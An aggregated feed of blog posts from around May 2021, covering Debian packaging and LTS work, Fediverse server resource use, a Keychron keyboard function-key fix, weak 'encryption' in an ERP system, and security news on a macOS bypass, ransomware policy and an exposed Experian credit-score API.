There are however some caveats in doing all this. What I found was that I had to install grub manually using grub-install --no-floppy on /dev/sda3 and /dev/sdb3, as Debian's grub refused to give me the option to install there. Several warnings came as a result, but things work ok anyway.
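Spelled out, the steps look roughly like this (a sketch based on the description above; the device names match the partition dumps, and install-mbr comes from Debian's mbr package):

```shell
# put Debian's plain mbr on both disks and have it boot the grub partition
install-mbr /dev/sda
install-mbr /dev/sdb

# embed grub directly into the btrfs /boot partitions on both disks
# (expect warnings; things work anyway)
grub-install --no-floppy /dev/sda3
grub-install --no-floppy /dev/sdb3
```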

One more warning: I did all this on Buster, but it looks like Grub 2.04, which is included in Bullseye, has gotten a bit bigger, so at least on my partitions there was no room for it and I had to leave the old Buster grub around for now. If anybody has any ideas on how to solve this... they are welcome.


Planet DebianIngo Juergensmann: The Fediverse – What About Resources?

Today is May 1st. In about two weeks, on May 15th, WhatsApp will put its changed Terms of Service into action, and if you don’t accept the new rules you won’t be able to use WhatsApp any longer.

Early this year there was already a strong movement away from WhatsApp towards other solutions – mainly to Signal, but other services like the Fediverse also gained some new users, and XMPP got its fair share of new users as well.

So, what to do about the WhatsApp ToS change? Shall we all go to Signal? Surely not. Signal is another vendor lock-in silo. It’s centralistic, and recent development plans aim to implement some crypto payment system. Even Bruce Schneier thinks that this is a bad idea.

Other alternatives often named include Matrix/Element and XMPP. Today, Don di Dislessia in the (German) Fediverse asked about the power consumption of the Fediverse, including Matrix and XMPP, and how much renewable energy is being used. Of course there is no easy answer to this question, but I tried my best – at least for my own server.

Here are my findings and conclusions…


screenshot showing power consumption of server

Currently my server in the colocation is using about 93W on average with a 6-core Xeon E5-2630L, 128 GB RAM, 4x 2 TB WD Red + 1 Samsung 960pro NVMe. The server is 7 years old. When I started with that server the power consumption was about 75W, but back then there were far fewer users on the server. So, about 20W more over the years…


I’ve been running my Friendica node since 2013. Over the years it became one of the largest Friendica servers in the Fediverse; for some time it was the largest one. It currently has around 700 total users and 180 monthly active users. My Mastodon instance has about 1000 total users and about 300 monthly active users.

Since last year I have also been running a Matrix-Synapse server. Although I invited my family, I’m in fact the only active user on that server, though I have joined some channels.

My XMPP server is even older than my Friendica node. For a long time I had maybe 20 users. Then I set up a new website and added some domains, and the user count increased; currently I have about 130 users on those two domains and maybe 50 monthly active users. Also note that all my Friendica and Mastodon users can use XMPP with their accounts, but they aren’t counted the same way as “native” users on ejabberd, because the auth backend is different.

So, let’s assume I do have like 2000 total users and 500 monthly active users.

CPU, Database Sizes and Disk I/O

Let’s have a look about how many resources are being used by those users.

Database Sizes:

  • Friendica (MariaDB): 31 GB for 700 users
  • Mastodon (PostgreSQL): 15 GB for 1000 users
  • Matrix-Synapse (PostgreSQL): 5 GB for 1 user
  • XMPP (PostgreSQL): 0.4 GB for 200 users

CPU times according to xentop:

  • Webserver VM (Matrix, Friendica & Mastodon): 13410130 s / 130%
  • XMPP VM: 944275 s / 5.4%

Friendica has the largest database and causes the most disk I/O on the NVMe, but it’s difficult to differentiate the load between the web apps on the webserver. So, let’s have a quick look at a simple metric:

Number of lines in webserver logfile:

  • Friendica: 11575 lines
  • Matrix: 8174 lines
  • Mastodon: 3212 lines

These metrics correlate to some degree with the database I/O load, at least for Friendica. If you take into account the number of users, things look quite different.
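Dividing each database size by its total user count makes the per-user difference explicit (a quick calculation from the numbers listed above):

```shell
awk 'BEGIN {
    printf "Friendica: %7.1f MB per user\n", 31 * 1024 / 700
    printf "Mastodon:  %7.1f MB per user\n", 15 * 1024 / 1000
    printf "Matrix:    %7.1f MB per user\n", 5 * 1024 / 1
    printf "XMPP:      %7.1f MB per user\n", 0.4 * 1024 / 200
}'
```

Roughly 45 MB per Friendica user, 15 MB per Mastodon user, and 2 MB per XMPP user – against more than 5 GB for the single active Matrix user.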


Overall, my personal impression is that Matrix is really bad in regard to resource usage. Given that I’m the only active user, it uses an exceptional amount of resources. When you also consider that Matrix uses a distributed database for its chat rooms, you can assume that this resource usage is multiplied across the network, making things even worse.

Friendica is using a large database and many disk accesses, but has a fairly large user base, so it seems ok, but of course should be improved.

Mastodon seems to be quite good, considering the database size, the number of log lines and the user count.

XMPP turns out to be the most efficient contestant in this comparison: it uses far fewer CPU cycles and causes much less database disk I/O.

Of course, Mastodon and Friendica are different services from XMPP or Matrix. So, coming back to the initial question about alternatives to WhatsApp, the answer for me is: you should prefer XMPP over Matrix, if only for reasons of saving resources and thus reducing power consumption. Less power consumption also means a smaller ecological footprint and fewer CO2 emissions for your communication with your family and friends.

XMPP is surely not the perfect replacement for WhatsApp, but I think it is the best thing to recommend. As said above, I don’t think that Signal is a viable option. It’s just another proprietary silo with all the problems that come with it. Matrix is a resource hog, and not a messenger but an MS Teams replacement. Element, the main Matrix client, is laggy and not multi-account/multi-server capable. Other Matrix clients do support multiple accounts but are not as feature-complete as Element. In the end the Matrix ecosystem will suffer from the same issues XMPP already faced a decade ago. But XMPP has learned to deal with them.

XMPP has also been progressing fast in the last years, and it has solved many of the problems people still complain about. Sure, there are still some open issues. The situation on iOS is still not as good as on Android with Conversations, but it is fairly close.

There are many efforts to improve XMPP. There is Quicksy IM, a service that uses your phone number as Jabber ID/JID and is thus comparable to Signal, which also uses phone numbers as unique identifiers; but Quicksy is compatible with XMPP standards. Snikket is another new XMPP ecosystem, aimed at smaller groups hosting their own server by simply installing a Docker container and setting up some basic SRV records in the DNS. Or there is Mailcow, a Docker-based mailserver setup that added an XMPP server as well, so you can have the same mail and XMPP address. Snikket even got EU-based funding for implementing XMPP account portability, which will improve decentralization even further. Additionally, XMPP helps with vaccination in Canada and the USA via vaxbot by Monal.

Be smart and use ecofriendly infrastructure.

Planet DebianPetter Reinholdtsen: VLC bittorrent plugin in Bullseye, saved by the bell?

Yesterday morning I got a warning call from the Debian quality control system that the VLC bittorrent plugin was due to be removed because of a release critical bug in one of its dependencies. As you might remember, this plugin makes VLC able to stream videos directly from a bittorrent source, using both torrent files and magnet links, similar to using an HTTP source. I believe such protocol support is a vital feature in VLC, allowing efficient streaming from sources such as the almost 7 million movies in the Internet Archive.

The dependency was the unmaintained libtorrent-rasterbar package, and the bug in question blocked its python library from working properly. As I did not want Bullseye to release without bittorrent support in VLC, I set out to check out the status, and track down a fix for the problem. Luckily the issue had already been identified and fixed upstream, providing everything needed. All I needed to do was to fetch the Debian git repository, extract and trim the patch from upstream and apply it to the Debian package for upload.

The fixed library was uploaded yesterday evening. But that is not enough to get it into Bullseye, as Debian is currently in package freeze to prepare for the next stable release. Only non-critical packages that include an autopkgtest setup (in other words, that can validate automatically that the package is working) are allowed to migrate automatically into the next release at this stage. The unmaintained libtorrent-rasterbar lacks such testing and thus needed a manual override. I am happy to report that this manual override was approved a few minutes ago, significantly increasing the chance of VLC bittorrent streaming being available out of the box for Debian/Bullseye users. A bit too close a shave for my liking, as the Bullseye release is most likely just a few days away; this did feel like the package was saved by the bell. I am so glad the warning email showed up in time for me to handle the issue, and a big thanks goes to the Debian Release team for the quick feedback on #debian-release and their swift unblocking.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.


Planet DebianJunichi Uekawa: May.

May. I told my son about the months in English. The numbers are straightforward, but he couldn't remember what the other ones are. He was amused when I told him that septem is seven in Latin, yet September is the ninth month. Octo, novem, and decem are similar.

Planet DebianPaul Wise: FLOSS Activities April 2021


This month I didn't have any particular focus. I just worked on issues in my info bubble.





  • Debian: restart service killed by OOM killer, revert mirror redirection
  • Debian wiki: unblock IP addresses, approve accounts



The flower/sptag work was sponsored by my employer. All other work was done on a volunteer basis.

Planet DebianChris Lamb: Free software activities in April 2021

Here is my monthly update covering what I have been doing in the free software world during April 2021 (previous month):


Reproducible Builds

One of the original promises of open source software is that distributed peer review and transparency of process results in enhanced end-user security. However, whilst anyone may inspect the source code of free and open source software for malicious flaws, almost all software today is distributed as pre-compiled binaries. This allows nefarious third-parties to compromise systems by injecting malicious code into ostensibly secure software during the various compilation and distribution processes.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

The project is proud to be a member project of the Software Freedom Conservancy. Conservancy acts as a corporate umbrella allowing projects to operate as non-profit initiatives without managing their own corporate structure. If you like the work of the Conservancy or the Reproducible Builds project, please consider becoming an official supporter.

This month, I:

  • Updated the main Reproducible Builds website and documentation:

    • Highlight our mailing list on the Contribute page. [...]
    • Add a noun (and drop an unnecessary full-stop) on the landing page. [...][...]
    • Correct a reference to the date metadata attribute on reports, restoring the display of months on the homepage. [...]
    • Correct a typo of "instalment" within a previous news entry. [...]
    • Added a conspicuous "draft" banner to unpublished blog posts in order to match the report draft banner. [...]
  • I also made the following changes to diffoscope, including uploading versions 172 and 173 to Debian:

    • Add support for showing annotations in PDF files. (#249)
    • Move to the assert_diff helper in [...]



  • redis (5:6.2.2-1) (to experimental) — New upstream release.

  • python-django:

    • 2.2.20-1 — New upstream security release.
    • 3.2-1 (to experimental) — New major upstream release (release notes).
  • hiredis (1.0.0-2) — Build with SSL/TLS support (#987114), and overhaul various aspects of the packaging.

  • mtools (4.0.27-1) — New upstream release.

Debian Long Term Support (LTS)

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project:

  • Investigated and triaged avahi (CVE-2021-3468), exiv2 (CVE-2021-3482), file-roller (CVE-2020-36314), fluidsynth (CVE-2021-28421), gnuchess (CVE-2021-30184), gpac (CVE-2021-28300), imagemagick (CVE-2021-20309, CVE-2021-20243), ircii (CVE-2021-29376), jetty9 (CVE-2021-28163), libcaca (CVE-2021-30498, CVE-2021-30499), libjs-handlebars, libpano13, libpodofo (CVE-2021-30469, CVE-2021-30470, CVE-2021-30471, CVE-2021-30472), mediawiki, mpv (CVE-2021-30145), nettle (CVE-2021-20305), nginx (CVE-2020-36309), nim (CVE-2021-21372, CVE-2021-21373, CVE-2021-21374), node-glob-parent (CVE-2020-28469), openexr (CVE-2021-3474), python-django-registration (CVE-2021-21416), qt4-x11 (CVE-2021-3481), qtsvg-opensource-src (CVE-2021-3481), ruby-kramdown, scrollz (CVE-2021-29376), syncthing (CVE-2021-21404), thunderbird (CVE-2021-23991, CVE-2021-23992, CVE-2021-23993) & wordpress (CVE-2021-29447).

  • Issued DLA 2620-1 to address a cross-site scripting (XSS) vulnerability in python-bleach, a whitelist-based HTML sanitisation library.

  • Issued DLA 2622-1 and ELA 402-1 as it was discovered that there was a potential directory traversal issue in Django, the popular Python-based web development framework. The vulnerability could have been exploited by maliciously crafted filenames. However, the upload handlers built into Django itself were not affected. (#986447)

  • Jan-Niklas Sohn discovered that there was an input validation failure in the X.Org display server. Insufficient checks on the lengths of the XInput extension's ChangeFeedbackControl request could have led to out-of-bounds memory accesses in the X server. These issues could have led to privilege escalation for authorised clients, particularly on systems where the X server is running as a privileged user. I, therefore, issued both DLA 2627-1 and ELA 405-1 to address this problem.

  • Frontdesk duties, reviewing others' packages, participating in mailing list discussions, etc., as well as attending our monthly meeting.


Planet DebianBastian Venthur: Getting the Function keys of a Keychron working on Linux

Having destroyed the third Cherry Stream keyboard in 4 years, I wanted to try a more substantial keyboard for a change. After some research I decided that I wanted a mechanical, wired, tenkeyless keyboard without any fancy LEDs.

In the end I settled on a Keychron C1 with red switches. It meets all my requirements, looks very nice, and the price is reasonable.


After the keyboard was delivered, I connected it to my Debian machine and was unpleasantly surprised to notice that the Function keys did not work at all. The keyboard shares the Multimedia keys with the F-keys, and there is an fn key that supposedly switches between the two modes, like you’re used to on a laptop. On Linux, however, you cannot access the F-keys at all: pressing fn + F1 or F1 makes no difference; you’ll always get the Multimedia key. Switching the keyboard between “Windows” and “Mac” mode makes no difference either; in both modes the F-keys are not accessible.

Apparently Keychron is aware of the problem, because the quick start manual tells you:

“We have a Linux user group on facebook. Please search “Keychron Linux Group” on facebook. So you can better experience with our keyboard.”

Customer support at its finest!

So at this point you should probably just send the keyboard back, get the refund and buy a proper one with functioning F-keys.

The fix

Test if this command fixes the issue and enables the Fn + F-key-combos:

# as root:
echo 2 > /sys/module/hid_apple/parameters/fnmode

Depending on the mode the keyboard is in, you should now be able to use the F-keys by simply pressing them, and the Multimedia keys by pressing fn + F-key (or the other way round). To switch the default mode of the F-keys to Function- or Multimedia-mode, press and hold fn + X + L for 4 seconds.

If everything works as expected, you can make the change permanent by creating the file /etc/modprobe.d/hid_apple.conf and adding the line:

options hid_apple fnmode=2

This works regardless of whether the keyboard is in Windows or Mac mode, and that might hint at the problem: in both cases Linux thinks you’re connecting a Mac keyboard.
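Note that the modprobe.d option alone only applies the next time the module is loaded. On Debian, a generic recipe (not from the original post; treat it as an assumption about your setup) is to reload the module and, if hid_apple is shipped in your initramfs, regenerate that too:

```shell
# Reload the module so the new fnmode takes effect immediately
sudo modprobe -r hid_apple && sudo modprobe hid_apple

# If hid_apple is loaded from the initramfs, regenerate it so the
# option also applies on the next boot
sudo update-initramfs -u
```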

The rant

Although the fix was not very hard to find and apply, this experience still leaves a foul taste. I naively assumed that the problem of having a keyboard that simply works when you plug it in had been thoroughly solved by 2021.

To make it worse, I assume Keychron must be aware of the problem because the other Keychron models have the same issue! But instead of fixing it on their end, they forward you to a facebook “community” and expect you to somehow fix it yourself.

So dear Keychron, you do make really beautiful keyboards! But before you release your next model with the same bug, maybe invest a bit in fixing the basics? I see that your keyboards support firmware updates for Windows and Mac – maybe you can talk to the folks over at the Linux Vendor Firmware Service and support Linux as well? Maybe you can even fix this annoying bug for the keyboards you’ve already sold? I found it really cute that you sent different keycaps for Windows and Mac setups – a few disappointed Linux users might accept an apology in the form of a Linux cap…

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, March 2021

A Debian LTS logo

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian project funding

In March, we put aside 3225 EUR to fund Debian projects, but sadly nobody picked up anything, so this is one of the many reasons Raphael posted a series of blog posts titled “Challenging times for Freexian”, published in 4 parts over the last two days of March and the first two of April. [Part one, two, three and four]

So we’re still looking forward to receiving more projects from various Debian teams! Learn more about the rationale behind this initiative in this article!

Debian LTS contributors

In March, 11 contributors were paid to work on Debian LTS, and their reports are available:

Evolution of the situation

In March we released 28 DLAs and held our second LTS team meeting for 2021 on IRC, with the next public IRC meeting coming up at the end of May.

At that meeting Holger announced that after 2.5 years he wanted to step back from his role helping Raphaël in coordinating/managing the LTS team. We would like to thank Holger for his continuous work on Debian LTS (which goes back to 2014) and are happy to report that we have already found a successor, whom we will introduce in the upcoming April report from Freexian.

Finally, we would like to remark once again that we are constantly looking for new contributors. For a last time, please contact Holger if you are interested!

The security tracker currently lists 42 packages with a known CVE and the dla-needed.txt file has 28 packages needing an update.

We are also pleased to report that we got 4 new sponsors over the last 2 months: thanks to sipgate GmbH, OVH US LLC, Tilburg University and Observatoire des Sciences de l’Univers de Grenoble!

Thanks to our sponsors

Sponsors that joined recently are in bold.

Worse Than FailureError'd: An Untimely Revival

We are all hopeful that there might be some cause for tentative optimism regarding the eventual end of the coronavirus pandemic. But horror fan Adam B. has dug up a new side effect that may upend everything.



Valts S. "While adding an API user to an IP camera I whipped out my trusty random password generator, copied, pasted, and got this message." These are depressingly common, aren't they? I need a catchy label for developers who solve their bobby-tables-troubles by content-filtering passwords. Suggestions, anyone?



UI expert Chris N. has diagnosed this little chucklemaker as "Firefox and Windows mixed DPI."



Vestaboard tire-kicker Daniel D. shares a definite WTF (it's obvious, right?) and possibly a 2WTF. "Is that a failsafe, if your country is not include in the dropdown? We will never know," he muses. Or maybe it's a double-secret nation hidden in the Apennines.

belgium, man.


It might not be as restorative as Adam's unearthed effect, earlier, but Peter G. has identified an unorthodox date ordering that might provide at least the illusion of eternal youth. This one probably "worked fine on my machine".



[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Cryptogram Serious MacOS Vulnerability Patched

Apple just patched a MacOS vulnerability that bypassed malware checks.

The flaw is akin to a front entrance that’s barred and bolted effectively, but with a cat door at the bottom that you can easily toss a bomb through. Apple mistakenly assumed that applications will always have certain specific attributes. Owens discovered that if he made an application that was really just a script—code that tells another program what to do rather than doing it itself—and didn’t include a standard application metadata file called “info.plist,” he could silently run the app on any Mac. The operating system wouldn’t even give its most basic prompt: “This is an application downloaded from the Internet. Are you sure you want to open it?”


Planet DebianReproducible Builds (diffoscope): diffoscope 173 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 173. This version includes the following changes:

[ Chris Lamb ]
* Add support for showing annotations in PDF files.
  (Closes: reproducible-builds/diffoscope#249)
* Move to assert_diff in

[ Zachary T Welch ]
* Difference.__init__: Demote unified_diff argument to a Python "kwarg".

You can find out more by visiting the project homepage.


Planet DebianAnton Gladky: 2021/04, FLOSS activity


This is my second month of working for LTS. I was assigned 12 hrs and worked all of them.

Released DLAs

  1. DLA 2619-1 python3.5_3.5.3-1+deb9u4

    CVE-2021-23336 introduced an API change. It was a hard decision to upload this fix, because it can potentially break users’ code if that code uses a semicolon as a separator. The alternative was not to fix it at all, leaving the security issue open, which was not a good solution either.

    I also fixed the failing autopkgtest, which was introduced in one of the latest CVE fixes. CI pipelines on salsa.d.o now help to detect such mistakes.

  2. DLA 2628-1 python2.7_2.7.13-2+deb9u5

    CVE-2021-23336 introduced the same API change as for python3.5, but the backporting was much harder, as porting Python 3 code back to Python 2 is not always easy.
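For context, the API change behind CVE-2021-23336 is visible in urllib.parse on patched Python 3 interpreters (the python2.7 backport differs in module layout): ';' is no longer treated as a query-string separator by default, and callers who relied on it must opt in via the new separator argument.

```python
from urllib.parse import parse_qsl

# Patched interpreters split only on '&' by default, so ';' is no
# longer a separator and stays inside the value:
print(parse_qsl("a=1;b=2"))                  # [('a', '1;b=2')]

# Code that relied on ';' must now ask for it explicitly:
print(parse_qsl("a=1;b=2", separator=";"))   # [('a', '1'), ('b', '2')]

# The common '&'-separated case is unchanged:
print(parse_qsl("a=1&b=2"))                  # [('a', '1'), ('b', '2')]
```

This is exactly the kind of behavioral change that can silently break downstream code, which is why uploading the fix was a hard call.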


I try to set up CI pipelines on salsa.d.o for all the LTS packages I touch. Setting up pipelines for python3.5 and python2.7 was much harder than for other packages, due to failing autopkgtests and some other issues. Though it takes more time at the beginning, I believe it improves package quality.


I attended the Debian LTS team Jitsi-meeting.

Krebs on SecurityTask Force Seeks to Disrupt Ransomware Payments

Some of the world’s top tech firms are backing a new industry task force focused on disrupting cybercriminal ransomware gangs by limiting their ability to get paid, and targeting the individuals and finances of the organized thieves behind these crimes.

In an 81-page report delivered to the Biden administration this week, top executives from Amazon, Cisco, FireEye, McAfee, Microsoft and dozens of other firms joined the U.S. Department of Justice (DOJ), Europol and the U.K. National Crime Agency in calling for an international coalition to combat ransomware criminals, and for a global network of ransomware investigation hubs.

The Ransomware Task Force urged the White House to make finding, frustrating and apprehending ransomware crooks a priority within the U.S. intelligence community, and to designate the current scourge of digital extortion as a national security threat.

The Wall Street Journal recently broke the news that the DOJ was forming its own task force to deal with the “root causes” of ransomware. An internal DOJ memo reportedly “calls for developing a strategy that targets the entire criminal ecosystem around ransomware, including prosecutions, disruptions of ongoing attacks and curbs on services that support the attacks, such as online forums that advertise the sale of ransomware or hosting services that facilitate ransomware campaigns.”

According to security firm Emsisoft, almost 2,400 U.S.-based governments, healthcare facilities and schools were victims of ransomware in 2020.

“The costs of ransomware go far beyond the ransom payments themselves,” the task force report observes. “Cybercrime is typically seen as a white-collar crime, but while ransomware is profit-driven and ‘non-violent’ in the traditional sense, that has not stopped ransomware attackers from routinely imperiling lives.”

A proposed framework for a public-private operational ransomware campaign. Image: IST.

It is difficult to gauge the true cost and size of the ransomware problem because many victims never come forward to report the crimes. As such, a number of the task force’s recommendations focus on ways to encourage more victims to report the crimes to their national authorities, such as requiring victims and incident response firms who pay a ransomware demand to report the matter to law enforcement and possibly regulators at the U.S. Treasury Department.

Last year, Treasury issued a controversial memo warning that ransomware victims who end up sending digital payments to people already being sanctioned by the U.S. government for money laundering and other illegal activities could result in hefty fines.

Philip Reiner, CEO of the Institute for Security and Technology and executive director of the industry task force, said the reporting recommendations are one of several areas where federal agencies will likely need to dedicate more employees. For example, he said, expecting victims to clear ransomware payments with the Treasury Department first assumes the agency has the staff to respond in any kind of timeframe that might be useful for a victim undergoing a ransomware attack.

“That’s why we were so dead set in putting forward comprehensive framework,” Reiner said. “That way, Department of Homeland Security can do what they need to do, the State Department, Treasury gets involved, and it all needs to be synchronized for going after the bad guys with the same alacrity.”

Some have argued that making it illegal to pay a ransom is one way to decrease the number of victims who acquiesce to their tormentors’ demands. But the task force report says we’re nowhere near ready for that yet.

“Ransomware attackers require little risk or effort to launch attacks, so a prohibition on ransom payments would not necessarily lead them to move into other areas,” the report observes. “Rather, they would likely continue to mount attacks and test the resolve of both victim organizations and their regulatory authorities. To apply additional pressure, they would target organizations considered more essential to society, such as healthcare providers, local governments, and other custodians of critical infrastructure.”

“As such, any intent to prohibit payments must first consider how to build organizational cybersecurity maturity, and how to provide an appropriate backstop to enable organizations to weather the initial period of extreme testing,” the authors concluded in the report. “Ideally, such an approach would also be coordinated internationally to avoid giving ransomware attackers other avenues to pursue.”

The task force’s report comes as federal agencies have been under increased pressure to respond to a series of ransomware attacks that were mass-deployed as attackers began exploiting four zero-day vulnerabilities in Microsoft Exchange Server email products to install malicious backdoors. Earlier this month, the DOJ announced the FBI had conducted a first-of-its-kind operation to remove those backdoors from hundreds of Exchange servers at state and local government facilities.

Many of the recommendations in the Ransomware Task Force report are what you might expect, such as encouraging voluntary information sharing on ransomware attacks; launching public awareness campaigns on ransomware threats; exerting pressure on countries that operate as safe havens for ransomware operators; and incentivizing the adoption of security best practices through tax breaks.

A few of the more interesting recommendations (at least to me) included:

-Limit legal liability for ISPs that act in good faith trying to help clients secure their systems.

-Create a federal “cyber response and recovery fund” to help state and local governments or critical infrastructure companies respond to ransomware attacks.

-Require cryptocurrency exchanges to follow the same “know your customer” (KYC) and anti-money laundering rules as financial institutions, and aggressively target exchanges that do not.

-Have insurance companies measure and assert their aggregated ransomware losses and establish a common “war chest” subrogation fund “to evaluate and pursue strategies aimed at restitution, recovery, or civil asset seizures, on behalf of victims and in conjunction with law enforcement efforts.”

-Centralize expertise in cryptocurrency seizure, and scale criminal seizure processes.

-Create a standard format for reporting ransomware incidents.

-Establish a ransomware incident response network.

Worse Than FailureCodeSOD: Secure By Design

Many years ago, I worked for a company that mandated that information like user credentials should never be stored "as plain text". It had to be "encoded". One of the internally-developed HR applications interpreted this as "base64 is a kind of encoding", and stored usernames and passwords in base64 encoding.

Steven recently encountered a… similar situation. Specifically, his company upgraded their ERP system, and reports that used to output taxpayer ID numbers now output ~201~201~210~203~… or similar values. He checked the data dictionary for the application, and saw that the taxpayer_id field stored "encrypted" values. Clearly, this data isn't really encrypted.

Steven didn't have access to the front-end code that "decrypted" this data. The reports were written in SSRS, which allows Visual Basic to script extensions. So, with an understanding of what taxpayer IDs should look like, Steven was able to "fix" the reports by adding this function:

public function ConvertTaxID(tax_id as string) as string
    dim splitchar as char = "~"
    dim splits() as string
    splits = tax_id.split(splitchar)
    dim i as integer
    for i = splits.length-1 to 0 step -1
        if isnumeric(splits(i)) then
            ConvertTaxID = ConvertTaxID & CHR(splits(i) - 125)
        end if
    next i
end function

We can now understand the "encryption" algorithm by understanding the decryption.

~ acts as a character separator, and each character is stored as its numeric ASCII representation, with a value added to it, which Steven undoes by subtracting the same value. To make this basic shift cypher more "secure", it's also reversed.
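Putting the two directions together: here is a minimal Python sketch of the scheme as described. The original "encryption" code isn't available, so the encoder is reconstructed by inverting the decoder, and both function names are mine, not the vendor's.

```python
def encode_tax_id(plaintext: str) -> str:
    """Reconstructed 'encryption': reverse the string, shift each
    character code up by 125, and join the numbers with '~'."""
    return "~" + "~".join(str(ord(c) + 125) for c in reversed(plaintext)) + "~"

def decode_tax_id(encoded: str) -> str:
    """Mirror of Steven's SSRS function: split on '~', walk the
    pieces last-to-first, and shift each numeric piece down by 125."""
    pieces = encoded.split("~")
    return "".join(chr(int(p) - 125) for p in reversed(pieces) if p.isdigit())

print(encode_tax_id("123"))            # ~176~175~174~
print(decode_tax_id("~176~175~174~"))  # 123
```

The round trip makes the weakness obvious: anyone who sees a few encoded values can recover the shift by subtraction.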

Steven adds:

Normally, this software is pretty solid, but this was one case where I was left wondering who got encryption advice from their 6 year old…

Sure, this is certainly an elementary school level encryption algorithm, but could a six year old have reverse engineered it? Of course not! So this is very secure, if your attacker is a six year old.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet DebianJunichi Uekawa: Setting wake-on-lan in Debian way.

Setting wake-on-lan in the Debian way. There are several ways your network interfaces can be configured. The Debian way is to use ifup/ifdown; make sure your network is configured with it by checking ifquery. nmcli d and networkctl list are the NetworkManager and systemd-networkd equivalents. Once you know which tool is managing your device, you can go ahead and set up the WoL configuration appropriately. A default Debian installation would probably start with an ifup/ifdown config.
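For the ifup/ifdown case, one common approach (an assumption on my part; the post doesn't show a concrete config, and eth0 is a placeholder interface name) is an up hook that calls ethtool from /etc/network/interfaces:

```shell
# /etc/network/interfaces -- eth0 is a placeholder; check `ifquery --list`
auto eth0
iface eth0 inet dhcp
    # enable magic-packet wake-on-lan each time the interface comes up
    up ethtool -s eth0 wol g
```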

Planet DebianNorbert Preining: In memoriam of Areeb Jamal

We lost one of our friends and core developers of the FOSSASIA community. An extremely sad day.

We miss you.

Planet DebianJunichi Uekawa: Surrounding a region with Emacs lisp.

Surrounding a region with Emacs Lisp. I wanted to surround a region with HTML tags, and here's what I learnt today. Specifying "r" in interactive gives two numbers, begin and end. When I want to obtain multiple kinds of values in interactive, I can use newlines to delimit the specs. set-marker is an API to keep a marker at the same relative position even after edits; the API requires make-marker to create an empty marker first, and since the number of live markers seems to affect editing speed, the API is designed to allow reuse of markers. After I got these going, I could write what I wanted.
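A sketch of the resulting command (the function name and details are mine, not the author's), showing both the "r" interactive spec and the marker handling described above:

```elisp
(defun my-surround-region-with-tag (begin end tag)
  "Wrap the region from BEGIN to END in the HTML tag TAG."
  ;; "r" supplies BEGIN and END from the region; a newline separates
  ;; it from the "s" spec that prompts for the tag name.
  (interactive "r\nsTag: ")
  (let ((end-marker (make-marker)))
    ;; set-marker keeps END pointing at the same text even after the
    ;; opening tag is inserted before it.
    (set-marker end-marker end)
    (goto-char begin)
    (insert (format "<%s>" tag))
    (goto-char end-marker)
    (insert (format "</%s>" tag))
    ;; Clear the marker so it no longer slows down editing.
    (set-marker end-marker nil)))
```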


Krebs on SecurityExperian API Exposed Credit Scores of Most Americans

Big-three consumer credit bureau Experian just fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity has learned. Experian says it has plugged the data leak, but the researcher who reported the finding says he fears the same weakness may be present at countless other lending websites that work with the credit bureau.

Bill Demirkapi, an independent security researcher who’s currently a sophomore at the Rochester Institute of Technology, said he discovered the data exposure while shopping around for student loan vendors online.

Demirkapi encountered one lender’s site that offered to check his loan eligibility by entering his name, address and date of birth. Peering at the code behind this lookup page, he was able to see it invoked an Experian Application Programming Interface or API — a capability that allows lenders to automate queries for FICO credit scores from the credit bureau.

“No one should be able to perform an Experian credit check with only publicly available information,” Demirkapi said. “Experian should mandate non-public information for promotional inquiries, otherwise an attacker who found a single vulnerability in a vendor could easily abuse Experian’s system.”

Demirkapi found the Experian API could be accessed directly without any sort of authentication, and that entering all zeros in the “date of birth” field let him then pull a person’s credit score. He even built a handy command-line tool to automate the lookups, which he dubbed “Bill’s Cool Credit Score Lookup Utility.”

Demirkapi’s Experian credit score lookup tool.

KrebsOnSecurity put that tool to the test, asking permission from a friend to have Demirkapi look up their credit score. The friend agreed and said he would pull his score from Experian (at this point I hadn’t told him that Experian was involved). The score he provided matched the score returned by Demirkapi’s lookup tool.

In addition to credit scores, the Experian API returns for each consumer up to four “risk factors,” indicators that might help explain why a person’s score is not higher.

For example, in my friend’s case Bill’s tool said his mid-700s score could be better if the proportion of balances to credit limits was lower, and if he didn’t owe so much on revolving credit accounts.

“Too many consumer finance company accounts,” the API concluded about my friend’s score.

The reason I could not test Demirkapi’s findings on my own credit score is that we have a security freeze on our files at the three major consumer credit reporting bureaus, and a freeze blocks this particular API from pulling the information.

Demirkapi declined to share with Experian the name of the lender or the website where the API was exposed. He refused because he said he suspects there may be hundreds or even thousands of companies using the same API, and that many of those lenders could be similarly leaking access to Experian’s consumer data.

“If we let them know about the specific endpoint, they can just ban/work with the loan vendor to block these requests on this one case, which doesn’t fix the systemic problem,” he explained.

Nevertheless, after being contacted by this reporter Experian figured out on its own which lender was exposing their API; Demirkapi said that vendor’s site now indicates the API access has been disabled.

“We have been able to confirm a single instance of where this situation has occurred and have taken steps to alert our partner and resolve the matter,” Experian said in a written statement. “While the situation did not implicate or compromise any of Experian’s systems, we take this matter very seriously. Data security has always been, and always will be, our highest priority.”

Demirkapi said he’s disappointed that Experian did exactly what he feared they would do.

“They found one endpoint I was using and sent it into maintenance mode,” he said. “But this doesn’t address the systemic issue at all.”

Leaky and poorly-secured APIs like the one Demirkapi found are the source of much mischief in the hands of identity thieves. Earlier this month, auto insurance giant Geico disclosed that fraudsters abused a bug in its site to steal drivers license numbers from Americans.

Geico said the data was used by thieves involved in fraudulently applying for unemployment insurance benefits. Many states now require drivers license numbers as a way of verifying an applicant’s identity.

In 2013, KrebsOnSecurity broke the news about an identity theft service in the underground that programmatically pulled sensitive consumer credit data directly from a subsidiary of Experian. That service was run by a Vietnamese hacker who’d told the Experian subsidiary he was a private investigator. The U.S. Secret Service later said the ID theft service “caused more material financial harm to more Americans than any other.”

Additional reading: Experian’s Credit Freeze Security is Still a Joke (Apr. 27, 2021)

